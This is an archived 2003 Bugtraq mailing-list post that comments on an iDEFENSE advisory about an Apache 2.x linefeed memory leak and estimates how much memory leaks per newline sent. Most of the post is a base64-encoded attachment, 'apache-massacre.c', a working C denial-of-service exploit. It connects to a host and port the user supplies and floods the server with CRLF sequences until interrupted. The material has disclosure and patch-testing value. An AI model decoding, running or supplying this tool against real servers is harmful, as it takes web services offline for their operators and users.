[29709] in bugtraq
Exploit Code Released for Apache 2.x Memory Leak
daemon@ATHENA.MIT.EDU (mattmurphy@kc.rr.com)
Wed Apr 9 23:28:59 2003
Message-ID: <29950-22003428224839770@M2W081.mail2web.com>
Reply-To: mattmurphy@kc.rr.com
From: "mattmurphy@kc.rr.com" <mattmurphy@kc.rr.com>
To: bugtraq@securityfocus.com
Date: Tue, 8 Apr 2003 18:48:39 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_01BC2B74.89D1CCC0"
------=_NextPart_000_01BC2B74.89D1CCC0
Content-type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
"iDEFENSE Labs" <labs@idefense=2Ecom> writes:
>II=2E DESCRIPTION
>
>Remote exploitation of a memory leak in the Apache HTTP Server causes the=
>daemon to over utilize system resources on an affected system=2E The prob=
lem
>is HTTP Server's handling of large chunks of consecutive linefeed
>characters=2E The web server allocates an eighty-byte buffer for each
>linefeed character without specifying an upper limit for allocation=2E
>Consequently, an attacker can remotely exhaust system resources by
>generating many requests containing these characters=2E
This is partially correct=2E Rather than "many requests containing these
characters", the more effective strategy is "many instances of this
character (these characters)"=2E
>III=2E ANALYSIS
>
>While this type of attack is most effective in an intranet setting, remot=
e
>exploitation over the Internet, while bandwidth intensive, is feasible=2E=
>Remote exploitation could consume system resources on a targeted system
>and, in turn, render the Apache HTTP daemon unavailable=2E
Isn't that the truth? In a few minutes, my Apache used some 390 MB of
memory when tested=2E The statement that only 80 bytes is lost per newlin=
e
understates the issue in my opinion=2E If we multiply:
2 newlines: 160 bytes
4 newlines: 320 bytes
8 newlines: 640 bytes
16 newlines: 1280 bytes
32 newlines: 2560 bytes
64 newlines: 5120 bytes
128 newlines: 10240 bytes
256 newlines: 20480 bytes
512 newlines: 40960 bytes
1024 newlines: 81920 bytes
Worse, Apache doesn't require any form to the request what-so-ever, so 1 K=
B
of 0x0A's is just as good as a well-formed request=2E Let's continue:
2 KB: 163840 bytes
4 KB: 655360 bytes
8 KB: 1310720 bytes
16 KB: 2621440 bytes
That's nearly 2 MB leaked in response to 16 KB=2E And, this is just basel=
ine
figures of the actual leak itself, and doesn't take into account various
other factors, including:
* Other use of memory by Apache
* The resources associated with the web session
>iDEFENSE has performed research using proof of concept exploit code to
>demonstrate the impact of this vulnerability=2E
I'm not seeing any example code, so let's try the attached=2E=20
"apache-massacre=2Ec" allows the user to target a host/port of choice=2E =
It
uses a single-connection method, and is stopped with a simple CTRL+C
interrupt=2E
It sends the data (which is patterns of "\r\n") in "chunks"=2E It sends a=
pre-specified number of character sequences, and then checks the interrupt=
flag for a request to terminate=2E Deployed on a high-bandwidth connectio=
n
(or a low-bandwidth connection with a lot of time to spare), Apache is
disabled within seconds=2E
The attached code compiles cleanly on Win32, and *should* compile on any
system that is POSIX-compliant, and offers a BSD socket interface=2E
>A successful exploitation scenario requires between two and=20
>seven megabytes of traffic exchange=2E
I hate to say, but I wonder where these figures come from=2E Obviously, a=
machine with a 16 MB RAM and a 512 MB hard drive is going to run out of
resources incredibly faster than a machine with 512 MB RAM and a 100 GB
hard drive is=2E Also, "between two and seven megabytes of traffic exchan=
ge"
is very possible with a DDoSnet of some kind=2E With 10 connections at 1
mbps each (for a combined speed of 10 mbps), approximately 1,750,000 bytes=
(1=2E25 MB) is exchanged each second=2E This same speed is reached by the=
full
upload rates of many LAN-based providers (schools, for instance)=2E Furth=
er,
a single cable modem has a link rate of 10 mbps, held down only by ISP
capping=2E
In the situation of such a network (or, a single uncapped cable modem), th=
e
entire traffic exchange rate is hit within one second=2E
--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web=2Ecom/ =2E
------=_NextPart_000_01BC2B74.89D1CCC0
Content-Type: application/octet-stream; name="apache-massacre.c"
Content-Transfer-Encoding: base64
Content-Description: apache-massacre.c
Content-Disposition: attachment; filename="apache-massacre.c"
LyogYXBhY2hlLW1hc3NhY3JlLmMNCiAqIFRlc3QgY29kZSBmb3IgQXBhY2hlIDIueCBNZW1vcnkg
TGVhaw0KICogQnkgTWF0dGhldyBNdXJwaHkNCiAqDQogKiBESVNDTEFJTUVSOiBUaGlzIGV4cGxv
aXQgdG9vbCBpcyBwcm92aWRlZCBvbmx5IHRvIHRlc3QgbmV0d29ya3MgZm9yIGENCiAqIGtub3du
IHZ1bG5lcmFiaWxpdHkuICBEbyBub3QgdXNlIHRoaXMgdG9vbCBvbiBzeXN0ZW1zIHlvdSBkbyBu
b3QgY29udHJvbCwNCiAqIGFuZCBkbyBub3QgdXNlIHRoaXMgdG9vbCBvbiBuZXR3b3JrcyB5b3Ug
ZG8gbm90IG93biB3aXRob3V0IGFwcHJvcHJpYXRlDQogKiBjb25zZW50IGZyb20gdGhlIG5ldHdv
cmsgb3duZXIuICBZb3UgYXJlIHJlc3BvbnNpYmxlIGZvciBhbnkgZGFtYWdlIHlvdXINCiAqIHVz
ZSBvZiB0aGUgdG9vbCBjYXVzZXMuICBJbiBubyBldmVudCBtYXkgdGhlIGF1dGhvciBvZiB0aGlz
IHRvb2wgYmUgaGVsZA0KICogcmVzcG9uc2libGUgZm9yIGRhbWFnZXMgcmVsYXRpbmcgdG8gaXRz
IHVzZS4NCiAqDQogKiBBcGFjaGUgMi54ICgyLjAuNDQgYW5kIHByaW9yKSBoYXMgYSBtZW1vcnkg
bGVhayBpbiBpdHMgcmVxdWVzdCBoYW5kbGluZw0KICogdGhhdCBjYXVzZXMgaXQgdG8gaGFuZGxl
IG5ld2xpbmVzIGluIGFuIGFrd2FyZCBtYW5uZXIgLS0gaXQgYWxsb2NhdGVzDQogKiA4MCBieXRl
cyBmb3IgZWFjaC4gIFRoaXMgcXVpY2tseSB0dXJucyBpbnRvIGEgbmlnaHRtYXJlIGZvciBzZXJ2
ZXIgc3RhdHMuDQogKiBPbiBXaW5kb3dzIFhQLCBJIHdhcyBhYmxlIHRvIGNhdXNlIEFwYWNoZSB0
byBjb25zdW1lIDM5MCBNQiBpbiBhIG1hdHRlcg0KICogb2YgYSBmZXcgbWludXRlcy4NCiAqDQog
KiBUaGUgaWRlYSBpcyB0byBmaXJlIG9mZiBtaWxsaW9ucyBvZiBuZXdsaW5lcywgZGVwcml2aW5n
IEFwYWNoZSBvZiB2YWx1YWJsZQ0KICogbWVtb3J5LCBjYXVzaW5nIGEgaHVnZSBwZXJmb3JtYW5j
ZSBkZWdyZWRhdGlvbi4gIFRoZSB3b3JzdCBwYXJ0IGFib3V0IHRoaXMNCiAqIGZsYXcgaXMgdGhh
dCBsZWFrZWQgbWVtb3J5IGlzbid0IHJlY292ZXJlZCB1bnRpbCB0aGUgQXBhY2hlIGNoaWxkIHBy
b2Nlc3MNCiAqIHRlcm1pbmF0ZXMuDQogKg0KICogVGhlIGhpZ2ggY29uc3VtcHRpb24gZHJvcHMg
c29tZSB3aGVuIHRoZSBzZXNzaW9uIGVuZHMsIGJ1dCB0aGVyZSBpcyBzdGlsbA0KICogYSBzdWJz
dGFudGlhbCBpbmNyZWFzZSBpbiBtZW1vcnkgdXNlIHRoYXQgZG9lc24ndCBlbmQgdW50aWwgQXBh
Y2hlIGV4aXRzLg0KICogSSBnb3QgbWVtb3J5IHVzZSB1cCB0byBhIHBlYWsgb2YgYWJvdXQgNjks
MDAwIEtCLCBhbmQgaXQgZHJvcHBlZCBkb3duIHRvDQogKiBhYm91dCAzNywwMDAgS0IuICBUaGUg
YXR0YWNraW5nIGNvZGUgd2FzIHRoZSBvbmx5IHRyYWZmaWMgb24gdGhlIHNlcnZlciAtLQ0KICog
dGhlIGlkbGUgbWVtb3J5IHVzZSBvZiB0aGUgc2VydmVyIGlzIGFib3V0IDcsMTMyIEtCLiAgQWx0
aG91Z2ggdGhlIGxlYWsgaXMNCiAqIGN1dCBpbiBoYWxmIHdoZW4gdGhlIGNvbm5lY3Rpb24gdGVy
bWluYXRlcywgdGhlIGxlYWsgaXMgc3RpbGwgYSBtaWdodHkNCiAqIDI5LDg3OCBLQiAoMjEuMyBN
QikuICBBbGwgdGhpcyBvY2N1cnJlZCBpbiBhIG1hdHRlciBvZiAxNSBzZWNvbmRzIG9uIG15DQog
KiAyLjUxIEdIeiBQNC4NCiAqDQogKiBBcyB3aXRoIG1vc3QgQXBhY2hlIGV4cG9zdXJlcywgdGhl
IGltcGFjdHMgdmFyeSBiZXR3ZWVuIHBvcnRzIG9mIHRoZSBzZXJ2ZXI6DQogKg0KICogTm9uLVVu
aXggKFdpbjMyLCBOZXR3YXJlLCBPUy8yKTogVGhlc2UgcG9ydHMgYXJlIG1vc3QgYWR2ZXJzZWx5
IGFmZmVjdGVkDQogKiBieSB0aGlzLCBhcyBBcGFjaGUncyBjaGlsZCBwcm9jZXNzIGRvZXNuJ3Qg
dGVybWluYXRlIG5vcm1hbGx5IHVubGVzcyB0aGUNCiAqIHBhcmVudCBwcm9jZXNzIHN0b3BzLiAg
VGhpcyBtZWFucyB0aGF0IGxlYWtzIChhbmQgYW55IHBlcmZvcm1hbmNlIGxvc3MpIGhhbmcNCiAq
IGFyb3VuZCB1bnRpbCBBcGFjaGUgaXMgcmVzdGFydGVkLg0KICoNCiAqIFVuaXgvbXBtX3ByZWZv
cms6IFRoaXMgTVBNIG9mZmVycyB0aGUgbW9zdCBwcm90ZWN0aW9uIGFnYWluc3Qgc3VjY2Vzc2Z1
bA0KICogZXhwbG9pdGF0aW9uLCBhcyBpdHMgcHJvY2Vzc2VzIGV4aXQgYXQgdGhlIGVuZCBvZiB0
aGUgcmVxdWVzdC4NCiAqDQogKiBVbml4L290aGVyIE1QTXM6IFRoZXNlIG90aGVyIE1QTXMgdXRp
bGl6ZSBtdWx0aXBsZSBBcGFjaGUgcHJvY2Vzc2VzIGZvciANCiAqIG11bHRpcGxlIEFwYWNoZSBy
ZXF1ZXN0cy4gIERlcGVuZGluZyBvbiB0aGUgTVBNIGluIHVzZSBhbmQgdGhlIHRyYWZmaWMgcmF0
ZXMNCiAqIG9mIHRoZSBzZXJ2ZXIsIHRoaXMgbWF5IGJlIHVzZWQgdG8gdGhlIGFkdmFudGFnZSBv
ZiBhIHBvdGVudGlhbCBhdHRhY2tlci4NCiAqIElmIG11bHRpcGxlIGRpZmZlcmVudCBBcGFjaGUg
cHJvY2Vzc2VzIGFyZSB1dGlsaXplZCwgYW4gYXR0YWNrZXIgY2FuIHNwcmVhZA0KICogdGhlIHN1
YnN0YW50aWFsIGxlYWsgYmV0d2VlbiBwcm9jZXNzZXMgdG8gZG9kZ2UgcmVzb3VyY2UgbGltaXRz
IGltcG9zZWQgb24NCiAqIGh0dHBkJ3MgVUlEICh1c3VhbGx5IG5vYm9keSwgd3d3LCBvciBhcGFj
aGUpDQogKg0KICogQ3JlZGl0OiBpREVGRU5TRSByZXBvcnRlZCB0aGlzIGlzc3VlIHRvIHNldmVy
YWwgc2VjdXJpdHkgbGlzdHMgb24gQXByaWwgOCwNCiAqIDIwMDMgZm9sbG93aW5nIHRoZSBBcGFj
aGUgcmVsZWFzZSBhbm5vdW5jZW1lbnQuICBBcGFjaGUgZml4ZWQgdGhlIGZsYXcgYWJvdXQNCiAq
IGEgbW9udGggYWZ0ZXIgdGhlIGluaXRpYWwgZGlzY2xvc3VyZSBvZiB0aGlzIHZ1bG5lcmFiaWxp
dHkuICBpREVGRU5TRSBjcmVkaXRzDQogKiB0aGUgZGlzY292ZXJ5IG9mIHRoaXMgdnVsbmVyYWJp
bGl0eSB0byBhbiBhbm9ueW1vdXMgcmVzZWFyY2hlci4NCiAqDQogKiBIYXBweSBIdW50aW5nIQ0K
ICovDQoNCiNpZm5kZWYgX1dJTjMyDQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzeXMv
dHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+DQojaW5jbHVkZSA8c3lzL3dhaXQuaD4N
CiNpbmNsdWRlIDxzeXMvc3RhdC5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8
bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUgPGZjbnRsLmg+DQojZWxzZQ0KI2luY2x1ZGUgPHdpbmRv
d3MuaD4NCiNwcmFnbWEgY29tbWVudChsaWIsICJ3c29jazMyLmxpYiIpDQojZW5kaWYNCiNpbmNs
dWRlIDxzdGRsaWIuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KDQppbnQgc2lnX2ZpcmVkID0gMDsN
Cg0KI2lmbmRlZiBfV0lOMzINCnZvaWQgc2lnX2hhbmRsZXIoaW50IHNpZykgew0KI2Vsc2UNCkJP
T0wgV0lOQVBJIHNpZ19oYW5kbGVyKERXT1JEIGR3Q3RybFR5cGUpIHsNCiNlbmRpZg0KCXNpZ19m
aXJlZCA9IDE7DQojaWZuZGVmIF9XSU4zMg0KCXJldHVybjsNCiNlbHNlDQoJcmV0dXJuIFRSVUU7
DQojZW5kaWYNCn0NCg0KaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkgew0KCVNPQ0tF
VCBzOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQoJY2hhciBidWZmZXJbMTAyNV07DQoJc3Ry
dWN0IGhvc3RlbnQgKmhlOw0KCXVuc2lnbmVkIHNob3J0IGlQb3J0ID0gODA7DQoJaW50IG5ld2xp
bmVzID0gMTAwOw0KCWNoYXIgKnA7DQoJY2hhciAqcDI7DQoJaW50IGk7DQojaWZkZWYgX1dJTjMy
DQoJV1NBREFUQSB3c2FfcHJvdjsNCiNlbmRpZg0KCXByaW50ZigiQXBhY2hlIE1hc3NhY3JlIHYx
LjBcclxuIik7DQoJcHJpbnRmKCJFeHBsb2l0IGJ5IE1hdHRoZXcgTXVycGh5XHJcbiIpOw0KCXBy
aW50ZigiVnVsbmVyYWJpbGl0eSByZXBvcnRlZCBieSBpREVGRU5TRSBMYWJzXHJcblxyXG4iKTsN
CiNpZmRlZiBfV0lOMzINCglpZiAoV1NBU3RhcnR1cCgweDAxMDEsICZ3c2FfcHJvdikpIHsNCgkJ
cGVycm9yKCJXU0FTdGFydHVwIik7DQoJCWV4aXQoMSk7DQoJfQ0KI2VuZGlmDQoJcHJpbnRmKCJQ
bGVhc2UgZW50ZXIgdGhlIHdlYiBzZXJ2ZXIncyBob3N0L0lQOiAiKTsNCglmZ2V0cygmYnVmZmVy
WzBdLCAxMDI0LCBzdGRpbik7DQoJaGUgPSBnZXRob3N0YnluYW1lKCZidWZmZXJbMF0pOw0KCWlm
ICghaGUpIHsNCgkJcGVycm9yKCJnZXRob3N0YnluYW1lIik7DQoJCWV4aXQoMSk7DQoJfQ0KCXNp
bi5zaW5fYWRkci5zX2FkZHIgPSAqKCh1bnNpZ25lZCBsb25nICopaGUtPmhfYWRkcik7DQoJcHJp
bnRmKCJQbGVhc2UgZW50ZXIgdGhlIHdlYiBzZXJ2ZXIncyBwb3J0OiAiKTsNCglmZ2V0cygmYnVm
ZmVyWzBdLCAxMDI0LCBzdGRpbik7DQoJaVBvcnQgPSAodW5zaWduZWQgc2hvcnQpYXRvaSgmYnVm
ZmVyWzBdKTsNCiNpZm5kZWYgX1dJTjMyDQojaWZkZWYgX1NPTEFSSVMNCglzaWdzZXQoU0lHSU5U
LCAmc2lnX2hhbmRsZXIpOw0KI2Vsc2UNCglzaWduYWwoU0lHSU5ULCAmc2lnX2hhbmRsZXIpOw0K
I2VuZGlmDQojZWxzZQ0KCVNldENvbnNvbGVDdHJsSGFuZGxlcigmc2lnX2hhbmRsZXIsIFRSVUUp
Ow0KI2VuZGlmDQoJcHJpbnRmKCJIb3cgbWFueSBuZXdsaW5lcyBzaG91bGQgYmUgaW4gZWFjaCBy
ZXF1ZXN0IFsxMDBdOiAiKTsNCglmZ2V0cygmYnVmZmVyWzBdLCAxMDI0LCBzdGRpbik7DQoJaWYg
KCFidWZmZXJbMF0gPT0gMHgwRCAmJiAhYnVmZmVyWzBdID09IDB4MEEpIHsNCgkJbmV3bGluZXMg
PSBhdG9pKCZidWZmZXJbMF0pOw0KCX0NCglwID0gbWFsbG9jKG5ld2xpbmVzKjIpOw0KCXAyID0g
cDsNCglmb3IgKGkgPSAwOyBpIDwgbmV3bGluZXM7IGkrKykgew0KCQkqcDIgPSAweDBEOw0KCQlw
MisrOw0KCQkqcDIgPSAweDBBOw0KCQlwMisrOw0KCX0NCgluZXdsaW5lcyArPSBuZXdsaW5lczsN
CglzID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCk7DQoJaWYgKHMg
PCAwKSB7DQoJCXBlcnJvcigic29ja2V0Iik7DQoJCWV4aXQoMSk7DQoJfQ0KCXNpbi5zaW5fZmFt
aWx5ID0gQUZfSU5FVDsNCglzaW4uc2luX3BvcnQgPSBodG9ucyhpUG9ydCk7DQoJaWYgKGNvbm5l
Y3QocywgKGNvbnN0IHN0cnVjdCBzb2NrYWRkciAqKSZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2Fk
ZHJfaW4pKSkgew0KCQlwZXJyb3IoImNvbm5lY3QiKTsNCgkJZXhpdCgxKTsNCgl9DQoJd2hpbGUg
KDEpIHsNCgkJaWYgKCFzZW5kKHMsIChjaGFyICopcCwgbmV3bGluZXMsIDApID09IG5ld2xpbmVz
KSB7DQoJCQlwZXJyb3IoInNlbmQiKTsNCgkJCWV4aXQoMSk7DQoJCX0NCgkJaWYgKHNpZ19maXJl
ZCkgew0KCQkJcHJpbnRmKCJUZXJtaW5hdGluZyBvbiBTSUdJTlQiKTsNCgkJCWZyZWUocCk7DQoj
aWZuZGVmIF9XSU4zMg0KCQkJY2xvc2Uocyk7DQojZWxzZQ0KCQkJY2xvc2Vzb2NrZXQocyk7DQoJ
CQlXU0FDbGVhbnVwKCk7DQojZW5kaWYNCgkJCWV4aXQoMCk7DQoJCX0NCgl9DQp9
------=_NextPart_000_01BC2B74.89D1CCC0--
